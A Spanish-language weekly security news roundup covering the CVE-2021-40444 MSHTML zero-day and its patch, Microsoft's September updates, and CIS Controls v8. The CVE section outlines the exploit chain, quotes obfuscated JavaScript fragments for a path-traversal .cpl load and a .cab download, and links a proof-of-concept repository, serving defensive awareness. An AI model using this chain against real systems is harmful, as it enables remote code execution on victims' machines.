Esta semana en ciberseguridad – Septiembre semana 3

CVE-2021-40444 – Microsoft publicó el parche para MSHTML

Microsoft publicó la actualización KB5005565 para vulnerabilidad Zero-Day CVE-2021-40444 crítica en el motor de renderizado MSHTML. Esta vulnerabilidad permite la ejecución de comandos en la máquina de la víctima cuando esta abre un documento especialmente diseñado y hace clic en “Habilitar contenido” para deshabilitar la función Vista protegida de Microsoft Office.

Les dejamos un resumen de cómo funciona el exploit y en las fuentes algunos link para generar algunas pruebas de concepto de este.

Funcionamiento del exploit
1. El documento contiene un objeto MHTML OLE que es un sitio web alojado en un endpoint controlado por un atacante.
2. El sitio web ejecuta código JavaScript ofuscado que crea una instancia de los controles ActiveX:

ActiveXObjectVAR[‘Script’][‘location’] = ‘.cpl:../../../AppData/Local/Temp/Low/championship.inf’

3. El código del sitio web obtiene y abre un archivo .cab desde el endpoint controlado por el atacante que contiene una DLL maliciosa con extension .inf:

XMLHttpRopen[‘call’](XMLHttpR, ‘GET’, ‘http://127.0.0.1/test.cab’, ![]).

4. El código del sitio web ejecuta el archivo .inf como un archivo del Panel de control (.cpl) utilizando la utilidad control.exe. Por ejemplo, el código del sitio web puede ejecutar el siguiente comando: control.exe .cpl:

../../../AppData/Local/Temp/championship.inf.

5. La utilidad control.exe se ejecuta como un proceso secundario del proceso que aloja la aplicación de Microsoft Office que abrió el documento de Office, como winword.exe.
6. El archivo DLL malicioso .inf se ejecuta en el contexto de rundll32.exe.

Hasta ahora las mitigaciones contra CVE-2021-40444 iban desde sugerir que se deshabilite ActiveX para la mayoría o todas las zonas de seguridad de Internet Explorer, así como deshabilitar el Shell Preview en el Explorador de Windows; esto se puede hacer a través de la Política de grupo o localmente a través de claves de registro.

FUENTE: (1) https://blog.segu-info.com.ar/2021/09/microsoft-publica-el-parche-para-el-0.html
(2) https://github.com/lockedbyte/CVE-2021-40444

Microsoft publicó su Update de Seguridad de Septiembre

CSIRT – El equpo de respuesta ante incidentes de Seguridad Informática del Gobierno de Chile, publicó esta semana las recomendaciones sobre 66 vulnerabilidades informadas por Microsoft en su Update Tuesday de Septiembre.

En la fuente les dejamos el inserto de Microsoft.

FUENTE: https://msrc.microsoft.com/update-guide/releaseNote/2021-Sepnk

v8 Controles CIS

Aunque no de esta semana, hoy queremos recordar el cambio de version de los Controles CIS.

El mes de Mayo del 2021, el Centro for Internet Security (CIS) lanzó oficialmente la versión 8 de los controles CIS, que se mejoró para mantenerse al día con la tecnología imperante en nuestros días y la creciente evolución de las amenazas. La pandemia cambió muchas cosas y esta nueva version de los controles CIS ahora incluye tecnologías móviles y cloud. tanto como un nuevo control “Service Provider Management” que da orientación de como las empresas pueden administrar sus servicios en nube.

Enfoque basado en tareas independientes de quien ejecuta el control.
Dado que las redes básicamente no tienen fronteras, lo que significa que ya no hay una red cerrada y centralizada donde residen todos los puntos finales, los controles ahora están organizados por actividad frente a cómo se administran las cosas.

Los esfuerzos para simplificar los controles y organizarlos por actividad dieron como resultado menos controles y menos salvaguardas (anteriormente subcontroles). Ahora hay 18 controles de nivel superior y 153 salvaguardas, distribuidos entre los tres Grupos de Implementación (GI).

Higiene basica
CIS Controls v8 define oficialmente IG1 cómo Higiene Básica y representa un estándar mínimo emergente de seguridad de la información para todas las empresas. IG1 (56 salvaguardas) es un conjunto fundamental de salvaguardas de ciberdefensa que toda empresa debe aplicar para protegerse contra los ataques más frecuentes.

El IG2 (74 salvaguardas adicionales) y el IG3 (23 salvaguardas) se basan en IG anteriores, siendo el IG1 la vía de acceso a los controles y el IG3 que incluye todas las salvaguardas para un total de 153.

El Informe de Investigaciones de Violación de Datos de Verizon (DBIR) de 2021 publicado recientemente ya menciona a CIS Controls v8 y los nuevos grupos de implementación. Verizon identificó un conjunto básico de controles que toda empresa debería implementar independientemente de su tamaño y presupuesto:

  • Control 4: Configuración segura de activos y software empresariales
  • Control 5: Gestión de cuentas
  • Control 6: Gestión del control de acceso
  • Control 14: Concientización sobre seguridad y capacitación en habilidades

Lo nuevo
Como es de costumbre, los cambios se basan en lo realmente importante y los objetivos de los Controles CIS:

  • El Ataque como referencia para la Defensa.
  • Foco en la identificación y priorización de los aspectos más críticos para detener los ataques más relevantes.
  • Salvaguardas viables y aplicables.
  • Controles medibles.

Adicionalmente, la nueva version de los controles CIS se alinean con otros framework o marcos regulatorios de gobierno y gestión. Los cuales hablan de las nuevas tendencias sobre servicios cloud, virtualización, movilidad, externalización y teletrabajo.

FUENTE: https://blog.segu-info.com.ar/2021/05/controles-cis-v8-18-es-el-nuevo-20.html
https://www.cisecurity.org/